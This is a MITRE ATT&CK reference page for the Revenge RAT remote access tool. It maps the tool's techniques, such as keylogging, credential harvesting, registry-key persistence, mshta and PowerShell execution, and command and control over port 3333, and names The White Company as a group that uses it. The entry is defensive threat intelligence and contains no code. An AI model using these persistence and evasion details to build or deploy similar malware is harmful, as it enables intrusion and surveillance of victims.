Register to stream ATT&CKcon 2.0 October 29-30

Revenge RAT

Revenge RAT is a freely available remote access tool written in .NET (C#).[1][2]

ID: S0379
Type: MALWARE
Platforms: Windows
Version: 1.0

Techniques Used

Domain ID Name Use
Enterprise T1123 Audio Capture Revenge RAT has a plugin for microphone interception. [1] [2]
Enterprise T1059 Command-Line Interface Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine. [2]
Enterprise T1003 Credential Dumping Revenge RAT has a plugin for credential harvesting. [1]
Enterprise T1132 Data Encoding Revenge RAT uses Base64 to encode information sent to the C2 server. [1]
Enterprise T1202 Indirect Command Execution Revenge RAT uses the Forfiles utility to execute commands on the system. [2]
Enterprise T1056 Input Capture Revenge RAT has a plugin for keylogging. [1] [2]
Enterprise T1170 Mshta Revenge RAT uses mshta.exe to run maliicous scripts on the system. [2]
Enterprise T1086 PowerShell Revenge RAT uses the PowerShell command Reflection.Assembly to load itself into memory to aid in execution. [2]
Enterprise T1060 Registry Run Keys / Startup Folder Revenge RAT creates a Registry key at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell to survive a system reboot. [1]
Enterprise T1076 Remote Desktop Protocol Revenge RAT has a plugin to perform RDP access. [1]
Enterprise T1105 Remote File Copy Revenge RAT has the ability to upload and download files. [1]
Enterprise T1053 Scheduled Task Revenge RAT schedules tasks to run malicious scripts at different intervals. [2]
Enterprise T1113 Screen Capture Revenge RAT has a plugin for screen capture. [1]
Enterprise T1064 Scripting Revenge RAT executes scripts on the victim's machine. [1] [2]
Enterprise T1082 System Information Discovery Revenge RAT collects the CPU information, OS information, and system language. [1]
Enterprise T1016 System Network Configuration Discovery Revenge RAT collects the IP address and MAC address from the system. [1]
Enterprise T1033 System Owner/User Discovery Revenge RAT gathers the username from the system. [1]
Enterprise T1065 Uncommonly Used Port Revenge RAT has communicated over TCP port 3333. [1]
Enterprise T1125 Video Capture Revenge RAT has the ability to access the webcam. [1] [2]
Enterprise T1102 Web Service Revenge RAT used blogpost.com as its primary command and control server during a campaign. [2]

Groups That Use This Software

ID Name References
G0089 The White Company [1]

References